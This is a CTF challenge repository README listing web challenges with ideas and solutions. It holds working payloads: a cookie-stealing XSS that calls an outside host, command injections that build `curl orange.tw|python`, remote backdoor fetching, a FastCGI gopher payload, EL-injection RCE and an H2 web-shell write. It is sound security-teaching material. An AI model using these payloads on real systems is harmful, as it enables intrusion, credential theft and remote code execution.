Collection of CTF Web challenges I made

Overview

My CTF Web Challenges

This is the repository of all CTF challenges I made, including the source code, write-up and idea explanation! Hope you like it :)

P.s. BTW, the Babyfirst series and One Line PHP Challenge are my favorite challenges. If you don't have enough time, please look at them at least!



W3rmup PHP

Difficulty: ★★
Solved: 22 / 666
Tag: PHP, Code Review, YAML, Command Injection

Source Code

Idea

  • The Norway Problem: the country code of Norway (NO) becomes False in YAML
  • Bypass escapeshellarg through the logic problem of count() + unset()

Solution

  • TBD

Write Ups

  • TBD

One-Bit Man

Difficulty:
Solved: 49 / 666
Tag: PHP, Code Review

Source Code

Idea

You can flip one bit in any file of the latest version of WordPress, and you have to pwn the server.

Solution

Flip the position 5389 of the file /var/www/html/wp-includes/user.php to NOP the NOT (!) operation.

    if ( ! wp_check_password( $password, $user->user_pass, $user->ID ) ) {
            return new WP_Error(

Write Ups

  • TBD

Metamon Verse

Difficulty: ★★★☆
Solved: 9 / 666
Tag: NFS, SSRF, RCE

Source Code

Idea

The idea is to use the SSRF to communicate with the local NFS/RPC server and get RCE. To complete the exploit, you have to:

  1. Construct the RPC/PORTMAP_CALL packet and send it to gopher://127.0.0.1:111/ to get the port of the mountd service.
  2. Construct the RPC/MNT_CALL packet and send it to gopher://127.0.0.1:<mnt-port>/ to get the file handle of the /data volume (remember to specify CURLOPT_LOCALPORT to bypass the authentication).
  3. Construct the RPC/NFS_CALL packet and send it to gopher://127.0.0.1:2049/ to create a SYMLINK (remember to specify CURLOPT_LOCALPORT to bypass the authentication).
  4. Symlink /app/templates/index.html to a controllable file to get an SSTI and get the RCE!

Solution

A dirty exploit can be found here

Write Ups

  • TBD

FBI Warning

Difficulty:
Solved: 25 / 666
Tag: MISC, OSINT, PHP, Code Review

Source Code

Idea

The website uses a famous Message Board project futaba-ng, and the ID generation is based on REMOTE_ADDR:

define("IDSEED", 'idの種');       // ID seed
...
$now.=" ID:".substr(crypt(md5($_SERVER["REMOTE_ADDR"].IDSEED.gmdate("Ymd", $time+9*60*60)),'id'),-8);

Solution

Because of the known IP prefix, you can identify the IP address of Ωrange by brute-force easily.

var_dump( substr(crypt(md5("219.91.64.47"."idの種"."20211203"),"id"),-8) == "ueyUrcwA" );
// bool(true)

Write Ups

  • TBD

Vulpixelize

Difficulty: ★☆
Solved: 41 / 666
Tag: Browser, Feature

Source Code

Idea

Use Chrome's new Text Fragments feature to extract the flag.

Solution

  • TBD

Write Ups

  • TBD

oShell

Difficulty: ★★
Solved: 21 / 1281
Tag: BlackBox, Shell, Command Injection

Source Code

Solution

  1. Leveraging strace in htop to read enable secret.
  2. Writing /home/oShell/.toprc with tcpdump -w
  3. Abusing top inspect feature to run arbitrary commands

Write Ups

oStyle

Difficulty: ★★☆
Solved: 10 / 1281
Tag: XSS

Source Code

Solution

  • The default Apache installation enables mod_negotiation, which allows .var mapping, and you can specify an arbitrary content-type there.

test.var

Content-language: en
Content-type: text/html
Body:----foo----

<script>
fetch('http://orange.tw/?' + escape(document.cookie))
</script>

----foo----

Write Ups

  • TBD

Return of Use-After-Flee

Difficulty: ★★★★★
Solved: 0 / 1281
Tag: WhiteBox, PHP, UAF, PWN

Source Code

Solution

  • Exploiting CVE-2015-0273 to pop the shell without known binaries. More detail will be published in my blog soon.

Write Ups

  • TBD

Virtual Public Network

Difficulty: ★☆
Solved: 81 / 1147
Tag: WhiteBox, Perl, Command Injection

Source Code

Solution

http://13.231.137.9/cgi-bin/diag.cgi
?options=-r@a="ls -alh /",system@a%23 2>tmp/orange.thtml <
&tpl=orange

Write Ups

  • TBD

Bounty Pl33z

Difficulty: ★★★☆
Solved: 30 / 1147
Tag: XSS

Source Code

Solution

Here we use Unicode U+2028 and U+3002 to bypass the \n and . filters.

http://3.114.5.202/fd.php
?q=ssl。orange。tw?xx"%2bdocument[`cookie`]%E2%80%A8-->

Unintended Solution

  • Nesting template expression

http://3.114.5.202/fd.php
?q=ssl。orange。tw?`%2b"%2bdocument[`cookie`];(`${`

Write Ups

  • TBD

GoGo PowerSQL

Difficulty: ★★★☆
Solved: 16 / 1147
Tag: Environment Injection, MySQL Client Attack

Source Code

Solution

  1. Buffer overflow the DB_HOST in BSS.
  2. Due to the patch, we can pollute environment variables which are not in the blacklist.
  3. Hijack the MySQL connection via an environment variable such as LOCALDOMAIN or HOSTALIASES.
  4. Read /FLAG by LOAD DATA LOCAL INFILE.

import requests

# Query string: 254 filler parameters, then the ones that matter
payload = ['x=x' for x in range(254)]
payload.append('name=x')
payload.append('HOSTALIASES=/proc/self/fd/0')
payload.append('orangeeeee=go')
payload = '&'.join(payload)

# Request body, which HOSTALIASES points at through /proc/self/fd/0
data = 'orangeeeee my.orange.tw'

r = requests.post('http://13.231.38.172/cgi-bin/query?'+payload, data=data)
print(r.content)

$ git clone https://github.com/lcark/MysqlClientAttack.git
$ cd MysqlClientAttack
$ python main.py -F /FLAG

Write Ups

  • TBD

Luatic

Difficulty: ★★☆
Solved: 42 / 1147
Tag: WhiteBox, Redis, Lua

Source Code

Solution

  1. Override PHP global variables.
  2. Redis implements the eval command by string concatenation, so we can escape the original Lua function and override global objects.

http://54.250.242.183/luatic.php
?_POST[TEST_KEY]=return 1 end function math:random() return 2
&_POST[TEST_VALUE]=0
&_POST[MY_SET_COMMAND]=eval
&_POST[token]=<token>
&_POST[guess]=2

http://54.250.242.183/luatic.php
?_POST[token]=<token>
&_POST[guess]=2

Unintended Solution

  • Lua is so magic that there are several unintended solutions. Sorry for the imperfect challenge :(

Write Ups

  • TBD

Buggy .Net

Difficulty: ★☆
Solved: 13 / 1147
Tag: ASP.NET, WhiteBox

Source Code

Solution

GET / HTTP/1.1
Host: buggy
Content-Type: application/x-www-form-urlencoded; charset=ibm500
Content-Length: 61

%86%89%93%85%95%81%94%85=KKaKKa%C6%D3%C1%C7K%A3%A7%A3&x=L%A7n

from urllib.parse import quote

# Percent-encode a string after encoding it as IBM500 (EBCDIC)
s = lambda x: quote(x.encode('ibm500'))
print('%s=%s&x=%s' % (s('filename'), s('../../FLAG.txt'), s('<x>')))

Write Ups

  • TBD

One Line PHP Challenge

Difficulty: ★★★★
Solved: 3 / 1816
Tag: PHP

Source Code

Solution

P.S. This is a default installation PHP7.2 + Apache on Ubuntu 18.04

  1. Control partial session file content by PHP_SESSION_UPLOAD_PROGRESS
  2. Bypass session.upload_progress.cleanup = On by race condition or slow query
  3. Control the prefix to @<?php by chaining PHP wrappers

Write Ups

Baby Cake

Difficulty: ★★★
Solved: 4 / 1816
Tag: Code Review, PHP, De-serialization

Source Code

Solution

Due to the implementation of CURLOPT_SAFE_UPLOAD in CakePHP's FormData.php, we can read arbitrary files!

# arbitrary file read, listen port 12345 on your server
http://13.230.134.135/
?url=http://your_ip:12345/
&data[x]=@/etc/passwd

# arbitrary deserialization with the Monolog POP chain
http://13.230.134.135/
?url=http://your_ip:12345/
&data[x]=@phar://../tmp/cache/mycache/[you_ip]/[md5_of_url]/body.cache

Write Ups

Oh My Raddit

Difficulty: ★★☆
Solved: 27 / 1816
Tag: Observation, DES checksum, Crypto, Web

Source Code

Solution

  1. Infer ECB mode from block frequency analysis
  2. Infer block size = 8 from the cipher length
  3. From the information above, it's reasonable to guess DES, which is used in the real world
  4. The most common block is 3ca92540eb2d0a42 (always at the end of the cipher). We can guess it's the padding \x08\x08\x08\x08\x08\x08\x08\x08
  5. Due to the parity checking in DES, we can reduce the keyspace from 26 (abcdefghijklmnopqrstuvwxyz) to 13 (acegikmoqsuwy)
    • Break in 1 second with HashCat
    • Break in 10 minutes with single thread Python
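
Steps 1, 2 and 4 above as an added Python example (not the author's solver): it counts ciphertext blocks across a set of hex tokens to infer ECB mode, the block size and the full-padding block. The tokens are constructed here with a keyed-hash stand-in for DES, because only the "same block in, same block out" property matters for the analysis; all names and sample plaintexts are assumptions.

```python
import hashlib
from collections import Counter
from functools import reduce
from math import gcd

KEY = b"constructed-demo-key"   # constructed; the analysis never uses it

# Constructed plaintexts in an "m=...&..." shape (assumption, not real traffic).
PLAINTEXTS = [
    b"m=p&l=10",
    b"m=p&l=100",
    b"m=d&f=uploads/a.pdf",
    b"m=d&f=uploads/bb.pdf.zip",
    b"m=r&u=http://a.example/x",
]


def toy_ecb_encrypt(key: bytes, plaintext: bytes, bs: int = 8) -> bytes:
    """Stand-in for DES-ECB with PKCS#5 padding: a keyed hash per block.

    It cannot be decrypted; it only reproduces the ECB property the analysis
    relies on (equal plaintext blocks give equal ciphertext blocks).
    """
    pad = bs - len(plaintext) % bs
    padded = plaintext + bytes([pad]) * pad
    return b"".join(
        hashlib.sha256(key + padded[i:i + bs]).digest()[:bs]
        for i in range(0, len(padded), bs)
    )


def sample_tokens() -> list[str]:
    """Hex tokens as an observer would collect them from links."""
    return [toy_ecb_encrypt(KEY, p).hex() for p in PLAINTEXTS]


def analyse(hex_tokens: list[str]) -> dict:
    tokens = [bytes.fromhex(h) for h in hex_tokens]
    # Step 2: every ciphertext length is a multiple of the block size, so the
    # GCD of the observed lengths is the largest candidate.
    bs = reduce(gcd, (len(t) for t in tokens))
    counts, last = Counter(), Counter()
    for t in tokens:
        blocks = [t[i:i + bs] for i in range(0, len(t), bs)]
        counts.update(blocks)
        last[blocks[-1]] += 1
    # Step 1: blocks repeated across messages are the ECB fingerprint.
    repeated = sum(1 for n in counts.values() if n > 1)
    # Step 4: a block that is the most frequent and only ever appears last is
    # the full padding block (plaintext length was a multiple of bs).
    top, top_n = counts.most_common(1)[0]
    return {
        "block_size": bs,
        "repeated_blocks": repeated,
        "looks_like_ecb": repeated > 0,
        "top_block": top.hex(),
        "top_block_always_last": last[top] == top_n,
    }


if __name__ == "__main__":
    for name, value in analyse(sample_tokens()).items():
        print(f"{name}: {value}")
```
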

Write Ups

Oh My Raddit v2

Difficulty: ★★
Solved: 10 / 1816
Tag: Web.py, SQL Injection to RCE

Source Code

Solution

Write Ups

Why so Serials?

Difficulty: ★★★★
Solved: 1 / 1816
Tag: De-serialization, RCE, ASP.NET, View State

Source Code

Solution

  1. Get the machineKey in web.config by Server-Side-Includes(.shtml or .stm)
  2. Exploit ASP.NET __VIEWSTATE by ysoserial.net

Write Ups

BabyFirst Revenge

Difficulty: ★☆
Solved: 95 / 1541
Tag: WhiteBox, PHP, Command Injection

Idea

  • Command Injection, but only in 5 bytes

Source Code

Solution

# generate `ls -t>g` to file "_"
http://host/?cmd=>ls\
http://host/?cmd=ls>_
http://host/?cmd=>\ \
http://host/?cmd=>-t\
http://host/?cmd=>\>g
http://host/?cmd=ls>>_

# generate `curl orange.tw|python` to file "g"
http://host/?cmd=>on
http://host/?cmd=>th\
http://host/?cmd=>py\
http://host/?cmd=>\|\
http://host/?cmd=>tw\
http://host/?cmd=>e.\
http://host/?cmd=>ng\
http://host/?cmd=>ra\
http://host/?cmd=>o\
http://host/?cmd=>\ \
http://host/?cmd=>rl\
http://host/?cmd=>cu\
http://host/?cmd=sh _

# got shell
http://host/?cmd=sh g

You can check the exploit.py for the detail! And there are also lots of creative solutions, you can check the write ups below.

Write Ups

BabyFirst Revenge v2

Difficulty: ★★★★
Solved: 8 / 1541
Tag: WhiteBox, PHP, Command Injection

Idea

  • Command Injection, but only in 4 bytes

Source Code

Solution

  1. generate g> ht- sl to file v
  2. reverse file v to file x
  3. generate curl orange.tw|python;
  4. execute x, ls -th >g
  5. execute g

You can check exploit.py for the detail!

Write Ups

SSRFme?

Difficulty: ★★☆
Solved: 20 / 1541
Tag: WhiteBox, Perl, PATH Pollution

Idea

  • CVE-2016-1238 (But the latest version of Ubuntu 17.04 in AWS is still vulnerable)
  • Perl looks up the current directory when importing modules
  • Perl module URI/lib/URI.pm#L136 will eval if there is an unknown scheme

Source Code

$ sudo apt install libwww-perl

Solution

# write evil URI module to current directory
$ curl 'http://host/?filename=URI/orange.pm&url=http://orange.tw/w/backdoor.pl'

# eval evil module `orange`
$ curl 'http://host/?filename=xxx&url=orange://orange.tw'

Write Ups

SQL so Hard

Difficulty: ★★★
Solved: 10 / 1541
Tag: WhiteBox, MySQL, PostgreSQL, SQL Injection, Code Injection

Idea

Source Code

Solution

Write Ups

Baby^H Master PHP 2017

Difficulty: ★★★★☆
Solved: 0 / 1541
Tag: WhiteBox, PHP, Serialization, Apache Prefork

Idea

  • PHP performs de-serialization when parsing PHAR
  • PHP assigned a predictable function name \x00lambda_%d to an anonymous function
  • Break shared VARIABLE state in Apache Pre-fork mode

Source Code

Solution

# get a cookie
$ curl http://host/ --cookie-jar cookie

# download .phar file from http://orange.tw/avatar.gif
$ curl -b cookie 'http://host/?m=upload&url=http://orange.tw/'

# force apache to fork new process
$ python fork.py &

# get flag
$ curl -b cookie "http://host/?m=upload&url=phar:///var/www/data/$MD5_IP/&lucky=%00lambda_1"

Write Ups

papapa

Difficulty:
Solved: 71 / 1024
Tag: BlackBox, SSL, Pentesting

Idea

  • Leak the internal hostname from SSL certificate

Source Code

Solution

$ openssl s_client -showcerts -connect 1.2.3.4:443 < /dev/null | openssl x509 -text | grep -A 1 "Subject Alternative Name"
...
depth=0 C = TW, ST = Some-State, O = Internet Widgits Pty Ltd, CN = very-secret-area-for-ctf.orange.tw, emailAddress = [email protected]
...
# get flag
$ curl -k  -H "host: very-secret-area-for-ctf.orange.tw" https://1.2.3.4/

Write Ups

Leaking

Difficulty: ★★
Solved: 43 / 1024
Tag: WhiteBox, JavaScript, NodeJS

Idea

Source Code

Solution

$ while true; do curl 'http://1.2.3.4/?data=Buffer(1e4)' | grep -a hitcon; done;

Write Ups

BabyTrick

Difficulty: ★★★
Solved: 24 / 1024
Tag: WhiteBox, PHP, MySQL, SQL Injection, Unserialize

Idea

Source Code

Solution

# get password
curl http://1.2.3.4/
?data=O:6:"HITCON":3:{s:14:"%00HITCON%00method";s:4:"show";s:12:"%00HITCON%00args";a:1:{i:0;s:39:"'union%20select%201,2,password%20from%20users%23";}}

# get flag
curl http://1.2.3.4/
?data=O:6:"HITCON":2:{s:14:"%00HITCON%00method";s:5:"login";s:12:"%00HITCON%00args";a:2:{i:0;s:7:"orÄnge";i:1;s:13:"babytrick1234";}}

Write Ups

Angry Boy

Difficulty: ★★☆
Solved: 43 / 1024
Tag: GrayBox, Java

Idea

Source Code

Solution

Write Ups

Angry Seam

Difficulty: ★★★★
Solved: 4 / 1024
Tag: GrayBox, Java, Seam Framework, CSS RPO, EL Injection, Java Deserialization

Idea

Source Code

Solution


P.s. I made this challenge because once, when I tried to review the code of Seam Framework, I found some 0-days and I thought it must have more. So I threw out a brick to attract jade. And the result was more than I expected :P


Intended solution

  • Register an account

    username: `AAAAAA`    
    password: `AAAAAA`  
    realname: `{/*';*/}%0a@import'http://orange.tw/?`  
    
  • Report URL

    http://1.2.3.4:8080/angryseam/profile.seam?actionOutcome=/profile.seam?username%3dAAAAAA
    

Unintended solution

  • Register an account
  • Update description to

    /?x=#{expressions.instance().createValueExpression(request.getHeader('cmd')).getValue()}

  • Login and access

    GET /angryseam/template.seam?actionMethod=template.xhtml:util.escape(sessionScope['user'].getDescription()) HTTP/1.1
    host: 1.2.3.4
    cmd: #{expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()[15].invoke(expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()[7].invoke(null),request.getHeader('ccc'))}
    ccc: ls -alh
    ...

Unintended solution

  • CVE-2013-2165 Java deserialization vulnerability

Unintended solution

  • SESSION manipulation... seam SUCKS

Write Ups

Babyfirst

Solved: 33 / 969
Difficulty: ★★
Tag: WhiteBox, PHP, Command Injection

Idea

  • Use NewLine to bypass regular expression check
  • Command injection only with alphanumeric characters

Source Code

<?php
    highlight_file(__FILE__);

    $dir = 'sandbox/' . $_SERVER['REMOTE_ADDR'];
    if ( !file_exists($dir) )
        mkdir($dir);
    chdir($dir);

    $args = $_GET['args'];
    for ( $i=0; $i<count($args); $i++ ){
        if ( !preg_match('/^\w+$/', $args[$i]) )
            exit();
    }

    exec("/bin/orange " . implode(" ", $args));
?>
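
The check in the source above, modelled as an added Python example (not the challenge's own code): Python's `re` treats `$` the same way PCRE does, so the loose pattern accepts newline-terminated arguments while an end-anchored pattern rejects them. The helper names are hypothetical; `PAGE_ARGS` holds the `args[]` values of the first request in the Solution, URL-decoded.

```python
import re
import shlex

# PHP's preg_match('/^\w+$/', ...) and this pattern share the same quirk:
# "$" matches at the very end OR just before one trailing "\n".
LOOSE = re.compile(r"^\w+$", re.ASCII)
# Python's \Z is the absolute end of the string. In PCRE the equivalent is \z
# or the D (PCRE_DOLLAR_ENDONLY) modifier.
STRICT = re.compile(r"\A\w+\Z", re.ASCII)

# args[] values of the first request in the Solution, URL-decoded.
PAGE_ARGS = ["x\n", "mkdir", "orange\n", "cd", "orange\n", "wget", "846465263\n"]


def passes(pattern: re.Pattern, args: list[str]) -> bool:
    """True when every argument is accepted by the given pattern."""
    return all(pattern.match(a) is not None for a in args)


def build_command(args: list[str]) -> str:
    """What the challenge source passes to exec(): plain concatenation."""
    return "/bin/orange " + " ".join(args)


def shell_commands(cmd: str) -> list[str]:
    """A newline ends a command, so each non-empty line runs on its own."""
    return [line.strip() for line in cmd.split("\n") if line.strip()]


def build_command_hardened(args: list[str]) -> str:
    """Anchor on the real end of the string, then quote each argument anyway."""
    if not passes(STRICT, args):
        raise ValueError("argument is not purely [A-Za-z0-9_]")
    return "/bin/orange " + " ".join(shlex.quote(a) for a in args)


if __name__ == "__main__":
    print("loose check accepts :", passes(LOOSE, PAGE_ARGS))
    print("strict check accepts:", passes(STRICT, PAGE_ARGS))
    for line in shell_commands(build_command(PAGE_ARGS)):
        print("shell would run     :", line)
    try:
        build_command_hardened(PAGE_ARGS)
    except ValueError as exc:
        print("hardened builder    :", exc)
```
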

Solution

http://localhost/
?args[0]=x%0a
&args[1]=mkdir
&args[2]=orange%0a
&args[3]=cd
&args[4]=orange%0a
&args[5]=wget
&args[6]=846465263%0a

http://localhost/
?args[0]=x%0a
&args[1]=tar
&args[2]=cvf
&args[3]=aa
&args[4]=orange%0a
&args[5]=php
&args[6]=aa

And there are also lots of creative solutions, you can check the write ups below.

Write Ups

nanana

Difficulty: ★★★
Solved: 18 / 969
Tag: GrayBox, C, PWN

Idea

  • Pwn without library
  • Format String without output
  • Bypass Stack Guard by using overflow ARGV[1]

Source Code

Solution

Write Ups

Giraffe's Coffee

Difficulty: ★★★☆
Solved: 16 / 969
Tag: WhiteBox, PHP

Idea

  • Break PHP PRNG
  • Break shared PRNG STATE in Apache Prefork mode

Source Code

Solution

TBD

Write Ups

lalala

Difficulty: ★★★☆
Solved: 2 / 969
Tag: BlackBox, PHP, SSRF

Idea

  • Bypass SSRF restriction with 302 redirect
  • Exploit FASTCGI protocol by using GOPHER

Source Code

Solution

<?php
header( "Location: gopher://127.0.0.1:9000/x%01%01Zh%00%08%00%00%00%01%00%00%00%00%00%00%01%04Zh%00%86%00%00%0E%03REQUEST_METHODGET%0F%0ASCRIPT_FILENAME/www/a.php%0F%16PHP_ADMIN_VALUEallow_url_include%20%3D%20On%09%26PHP_VALUEauto_prepend_file%20%3D%20http%3A//orange.tw/x%01%04Zh%00%00%00%00%01%05Zh%00%00%00%00" );

Write Ups

Use-After-FLEE

Solved: 1 / 969
Difficulty: ★★★★☆
Tag: WhiteBox, PHP, UAF, PWN

Idea

Source Code

Solution

TBD

Write Ups

PUSHIN CAT

Solved: 8 / 1020
Difficulty: ★★
Platform: BlackBox, PHP, H2, SQL Injection

Idea

  • SQL Injection on H2 Database
  • Execute Code by using H2 SQL Injection

Source Code

Solution

TBD

Write Ups

PY4H4SHER

Solved: 30 / 1020
Difficulty: ★★☆
Tag: WhiteBox, Python, Collision, HPP

Idea

Source Code

Solution

TBD  

Write Ups

LEENODE

Solved: 2 / 1020
Difficulty: ★★★
Tag: BlackBox, ColdFusion, Apache

Idea

  • Multilayered architecture vulnerability
  • Double Encoding

Source Code

Solution

# get password
$ curl http://1.2.3.4/admin%252f%252ehtpasswd%2500.cfm

# get flag
$ curl http://1.2.3.4/admin/thefl4g.txt 

Write Ups

BlackBox

Solved: 0 / 12
Difficulty: ★★★★
Tag: GrayBox, PHP, JAVA, mod_jk, H2, SQL Injection, WAF

Idea

  • Multilayered architecture vulnerability
  • Default and up to date mod_jk leads to directory traversal
  • Bypass WAF by incorrect usage of BASE64 and URLENCODE
  • SQL Injection on H2 Database
  • Execute Code by using H2 SQL Injection

Source Code

Solution

  • Get source code

    http://1.2.3.4/login/..;/
    
  • Review code and find a way to bypass WAF

    $ curl "http://1.2.3.4/news/?id=1~~~~' and 1=2 union select null,null,version(),null--"
    $ curl "http://1.2.3.4/news/?id=1~~~~' and 1=2 union select null,null,file_read('/etc/apache2/sites-enabled/000-default.conf'),null--"

  • Write shell

    $ curl "http://1.2.3.4/news/?id=1~~~~' and 1=2 union select null,null,file_write('3c3f706870206576616c28245f504f53545b6363635d293b3f3e', '/www/write_shell_here_=P/.a.php'),null--"
    $ curl "http://1.2.3.4/write_shell_here_=P/.a.php" -d 'phpinfo();'

Write Ups

TBD

SQLPWN

Solved: 0 / ??
Difficulty: ★★★
Tag: WhiteBox, PHP, SQL Injection, LFI, Race Condition

Idea

  • One-byte off SQL Injection
  • Race Condition
  • Local file inclusion with PHP session

Source Code

Solution

  • Run exploit.py to win race condition

  • Login and SQL Injection

    $ curl http://1.2.3.4/sqlpwn.php -d 'title=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\&note=, concat(0x3a3a3a3a3a3a,(select pass from users where name=0x6f72616e6765)))#'

  • Local file inclusion with session

    $ curl 'http://1.2.3.4/sqlpwn.php?mode=admin&boom=../../../../../../var/lib/php5/sess_243220'

Write Ups


Comments
  • Fix payload padding to avoid loop

    Hey,

    Thanks for the awesome challenge (and the solving script)! I would like to make a friendly contribution :)

    In order to avoid padding for a single base64 encoding, we need the length l of our initial message to be a multiple of 3, as three 8-bit characters are encoded as exactly four 6-bit/base64 characters.

    The length of the resulting message will be l × 4 / 3, since three characters are encoded into four.

    len(x) = l × 4 / 3
    len(xx) = l × 4 / 3 × 4 / 3
    len(xxx) = l × 4 / 3 × 4 / 3 × 4 / 3

    For xxx to not contain padding, we need len(xx) to be a multiple of 3; same reasoning for len(xx), for which you need len(x) to be a multiple of 3, and len(x) for which you need l to be a multiple of 3.

    Since 3 and 4 are coprime, we can sort of remove the 4 from the equations for our reasoning. Hence, we need:

    l % 3 == 0 && len(x) % 3 == 0 && len(xx) % 3 == 0
    <=> l % 3 == 0 && l / 3 % 3 == 0 && l / 3 / 3 % 3 == 0
    <=> l % 3^3 == 0
    <=> l % 27 == 0

    Sorry for the long-winded (possibly unneeded?) explanation!

    opened by bchetioui 4
  • Hitcon 2015 lalala web400 task: this writeup is strange

    The returned data is only saved to disk after it passes the check_image function, so the content read with file:///index.php in this writeup should not be saved to disk.

    So how is it possible to read index.php or the /etc/nginx/sites-enabled/default file?

            if ( $http_info['http_code'] == 404 ){
                alert('not found');
            } else{
                if ( check_image($data) )
                    file_put_contents($DIR . $filename, $data);
            }
    
    opened by leveryd 1
Owner
Orange Tsai